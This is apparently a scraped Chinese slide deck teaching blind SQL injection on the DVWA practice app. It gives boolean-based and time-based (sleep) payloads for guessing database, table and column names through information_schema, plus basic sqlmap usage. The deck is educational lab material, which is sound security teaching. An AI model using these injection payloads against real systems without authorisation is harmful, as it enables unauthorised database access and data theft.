Download presentation
Presentation is loading. Please wait.
1
Web安全基础教程
2
SQL注入之盲注 注入测试 Sqlmap的简单使用
3
什么是SQL盲注?? 一般的sql注入在我们输入sql语句的时候都会返回我们执行sql语句的结果,比如我们插入database(),执行结果就会是列举出当前所在的数据库名称dvwa; 而盲注就好像是在做判断题,我们执行的结果不会显示出来,只会告诉你“对”或者“不对”,不会出现回显现象。 回显:就是显示正在执行的批处理命令及执行的结果等。
4
猜测长度:1’ and length(database())>1 # 或>1(依次递增1,2,3…)4
猜测库名:1’ and ascii(substr(database(),1,1))>97 # (对应ASCII码) dvwa <、>号可以迅速确定大概范围 猜测表名: 1、猜测表的数量:1' and (select count(table_name) from information_schema.tables where table_schema=database())=2# 2、猜测表长度:1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 获取表名:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #
5
猜测字段的长度: 1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 # 猜解字段: 1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>120 #
6
sqlmap 针对链接:python sqlmap.py –u “url” 针对数据包: python sqlmap.py –r 1.txt
7
基于时间的盲注 判断数据库长度:1’ and if(length(database())=4,sleep(3),1) #
猜测数据库名称:1’ and if(ascii(substr(database(),1,1))>97,sleep(3),1)# 猜测表的数量:1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 猜测表名的长度:1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 下面就都可以结合二分法来进行操作…
8
Thanks
Similar presentations